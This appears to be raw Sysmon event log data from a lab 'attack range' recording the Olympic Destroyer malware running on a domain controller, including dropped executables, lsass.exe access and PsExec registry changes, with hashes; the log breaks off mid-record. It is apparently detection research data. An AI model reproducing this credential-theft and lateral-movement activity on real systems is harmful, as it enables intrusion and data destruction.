"C:\Users\ADMINI~1\AppData\Local\Temp\_pwv.exe"C:\Temp\ATTACKRANGE\Administrator{C8EA50B7-F2AC-6215-B31E-0B0000000000}0xb1eb32HighMD5=27304B246C7D5B4E149124D5F93C5B01,SHA256=3337E3875B05E0BFBA69AB926532E3F179E8CFBF162EBB60CE58A0281437A7EF,IMPHASH=C1E59519B5E5D84AF07AFA6F5A8625F1{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe"C:\Temp\olympic_destroyer.exe" 10341000x8000000000000000293087Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.325{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1319-6216-4F06-000000003802}6388C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293086Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.193{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293085Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.193{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293084Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.193{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293083Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.193{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293082Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:29.177{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 13241300x8000000000000000293081Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:29.177{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 10341000x8000000000000000293080Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.093{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1318-6216-4E06-000000003802}6532C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293079Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.093{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1318-6216-4E06-000000003802}6532C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293078Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.093{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-1318-6216-4D06-000000003802}5788C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293077Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.093{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-1318-6216-4D06-000000003802}5788C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293076Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.061{C8EA50B7-1318-6216-4D06-000000003802}57886540C:\Windows\system32\conhost.exe{C8EA50B7-1318-6216-4B06-000000003802}6572C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293075Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:29.061{C8EA50B7-1318-6216-4E06-000000003802}65322956C:\Windows\system32\conhost.exe{C8EA50B7-1318-6216-4C06-000000003802}7072C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293074Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.978{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-1318-6216-4E06-000000003802}6532C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293073Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.978{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-1318-6216-4D06-000000003802}5788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293072Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.962{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1318-6216-4E06-000000003802}6532C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293071Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:28.962{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-1318-6216-4D06-000000003802}5788C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000217814Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:30.856{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=199772E50678D933322C9289DF8293DD,SHA256=04E3C14803A02CB6A7DE041FF8BA07FFB19AFC4F56C5DF175E13EE7BE8C2EEA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293105Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:30.478{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=73AFECC3006BD4756BFDF87CD1D4C45F,SHA256=43E2F4E5D6F05EDEC41232146DBC22DD3D1063D5B795788B81B45735CB3C50AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217813Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:30.340{4F8D34B0-F11C-6215-1100-000000003902}980NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=8E7666CE9C1FC3A2B05B8C3AF701924A,SHA256=037F9487117163648A3EA0AC3ABC014F35A7C613AB57EE38A90F5C3DBEB305E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000217815Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:57:31.856{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F71CF6DF89537E74A2D874BBEA5C36D,SHA256=ED7F066068377E419AA2EB545321C9205215A094B4DEE328FFEFDD36B87C5356,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293125Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.631{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-12E6-6216-4B05-000000003802}6792C:\Temp\olympic_destroyer.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 534500x8000000000000000293124Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.631{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe 10341000x8000000000000000293123Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.609{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\lsasrv.dll+26327|C:\Windows\system32\lsasrv.dll+2746d|C:\Windows\system32\lsasrv.dll+261a5|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293122Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.609{C8EA50B7-F11D-6215-0B00-000000003802}6281608C:\Windows\system32\lsass.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\RPCRT4.dll+2be8f|C:\Windows\system32\lsasrv.dll+260ed|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 13241300x8000000000000000293121Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.localAlert,Sysinternals Tool UsedSetValue2022-02-23 10:57:31.578{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exeHKU\S-1-5-21-1032146228-2128790581-2941542908-500\SOFTWARE\Sysinternals\PsExec\EulaAcceptedDWORD (0x00000001) 23542300x8000000000000000293120Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.547{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C07AABD9B772788E25633517941A3D0,SHA256=C89F60C7ED1A41A680A9DD92C12C75B22A06B3963FD4658C8C8DE09A15A37452,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000293119Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.528{C8EA50B7-F11F-6215-1000-000000003802}3641580C:\Windows\system32\svchost.exe{C8EA50B7-131B-6216-5206-000000003802}5132C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293118Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.528{C8EA50B7-F11F-6215-1000-000000003802}3641376C:\Windows\system32\svchost.exe{C8EA50B7-131B-6216-5206-000000003802}5132C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293117Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.478{C8EA50B7-131B-6216-5206-000000003802}51321956C:\Windows\system32\conhost.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293116Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.447{C8EA50B7-F2AA-6215-B100-000000003802}22442592C:\Windows\system32\csrss.exe{C8EA50B7-131B-6216-5206-000000003802}5132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293115Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.431{C8EA50B7-F11F-6215-1400-000000003802}10483464C:\Windows\System32\svchost.exe{C8EA50B7-131B-6216-5206-000000003802}5132C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac96|c:\windows\system32\pcasvc.dll+aaf6|c:\windows\system32\pcasvc.dll+aab8|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293114Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-F2AA-6215-B100-000000003802}22444896C:\Windows\system32\csrss.exe{C8EA50B7-131B-6216-5106-000000003802}5896C:\Users\ADMINI~1\AppData\Local\Temp\_vea.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000293113Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293112Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293111Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:57:31.294{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000293110Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 